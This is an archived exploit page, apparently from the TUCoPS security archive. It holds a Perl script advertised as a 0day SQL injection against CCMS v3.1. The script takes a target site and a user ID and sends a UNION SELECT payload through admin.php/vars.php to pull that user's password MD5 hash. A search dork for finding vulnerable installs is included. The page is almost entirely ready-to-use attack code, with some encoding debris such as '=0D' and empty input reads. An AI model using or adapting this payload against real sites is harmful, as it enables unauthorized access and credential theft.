Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: bx1240.htm

CCMS v3.1 Demo <= SQL Injection Vulnerability 0day



CCMS v3.1 Demo <= SQL Injection Vulnerability 0day
CCMS v3.1 Demo <= SQL Injection Vulnerability 0day



#!/usr/bin/perl =0D
#Found by Pr0metheuS =0D
#Coded by Pr0metheuS =0D
#Gr33tz-Team =0D
#Dork : intitle:"CCMS v3.1 Demo PW" =0D
print "______________________________________\n"; =0D
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; =0D
print "______________________________________\n"; =0D
print "[+] Enter SITE:\n"; =0D
$SITE = ; =0D
chomp $SITE; =0D
print "[+] Enter PATH:\n"; =0D
$PATH = ; =0D
chomp $PATH; =0D
print "[+] Enter USERID:\n"; =0D
$USERID = ; =0D
chomp $USERID; =0D
print "______________________________________\n"; =0D
#Send Request =0D
use LWP::UserAgent; =0D
$ua = new LWP::UserAgent; =0D
$ua->agent("Mozilla/8.0"); =0D
$ua = LWP::UserAgent->new; =0D
my $req = HTTP::Request->new(GET => "$SITE$PATH/admin.php/vars.php?page=Console&p=1'+union+select+userid,2,3,PASSWORD+from+user+where+userid=$USERID/*"); =0D
$req->header('Accept' => 'text/html'); =0D
$res = $ua->request($req); =0D
$con = $res->content; =0D
#FIND MD5 IN TEXT REGEX !!! =0D
if ($con =~ "/([0-9a-fA-F]{32})/") { =0D
print "______________________________________\n"; =0D
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; =0D
print "[+] Exploit successful!\n"; =0D
print "[+] USERID:$USERID\n"; =0D
print "[+] MD5:$1\n"; =0D
print "______________________________________\n"; =0D
} =0D
else{ =0D
print "______________________________________\n"; =0D
print "-=-=-=-=-=-=+-=-=-=-=-=-=-+-=-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+CCMS Exploit...+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+Remote MD5 Hash+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+By Pr0metheus..+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+Gr33tz to :+-=-=-=-=|\n"; =0D
print "-=-=-=-=-=-=+pawel2827, d3d!k, J4Z0, chez, fir3+-=-=-=-=|\n"; =0D
    print "[+] Exploit Failed!\n"; =0D
}


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH